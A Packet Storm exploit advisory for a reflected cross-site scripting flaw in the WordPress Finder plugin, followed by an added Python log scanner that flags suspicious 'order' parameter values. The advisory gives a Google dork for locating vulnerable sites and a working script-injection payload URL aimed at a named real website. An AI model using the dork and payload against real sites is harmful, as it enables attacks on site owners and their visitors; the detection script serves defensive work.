WordPress Finder Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115902
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
`###################################################################################  
  
# Exploit Title: WordPress Finder Cross Site Scripting Vulnerability  
#  
# Google Dork: inurl:wp-content/plugins/finder/  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Tested on: all  
#  
###################################################################################  
  
$  
$ ----Author will not be responsible for any damage----  
$  
###################################################################################  
  
  
========================================  
The order parameter in the index.php file is vulnerable to XSS:  
index.php?by=type&dir=[dir]&order=[xss]  
D3M0 :   
http://andyrutter.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E  
  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`
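
Requests that probe this parameter can be found in web server logs. The following is an added example, not part of the original advisory: it scans combined-format access log lines for requests to the plugin's index.php whose decoded `order` value is not a plain token. The allow-list pattern, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path from the advisory: the plugin's index.php.
FINDER_PATH = "/wp-content/plugins/finder/index.php"
# Assumption: a legitimate sort value is a short alphanumeric token.
SAFE_ORDER = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_order_values(log_lines):
    """Return (line_no, decoded order value) for Finder requests whose
    order parameter is not a plain token."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(FINDER_PATH):
            continue
        # parse_qs percent-decodes once; a double-encoded value still
        # contains '%' afterwards and therefore fails the token check.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("order", []):
            if not SAFE_ORDER.fullmatch(value):
                hits.append((n, value))
    return hits

# Constructed sample log lines (hosts and addresses are placeholders).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Aug/2012:10:00:01 +0000] "GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=asc HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Aug/2012:10:02:17 +0000] "GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E HTTP/1.1" 200 5188',
    '203.0.113.9 - - [25/Aug/2012:10:02:40 +0000] "GET /index.php?order=%3Cb%3E HTTP/1.1" 200 900',
    '198.51.100.7 - - [25/Aug/2012:10:05:00 +0000] "GET /blog/wp-content/plugins/finder/index.php?order=%253Cscript%253E&by=name HTTP/1.1" 200 5001',
]

if __name__ == "__main__":
    for line_no, value in suspicious_order_values(SAMPLE_LOG):
        print(f"line {line_no}: order={value!r}")
```

The same token check, applied server-side before the value is echoed into the page and combined with HTML output encoding, is the corresponding fix in the plugin.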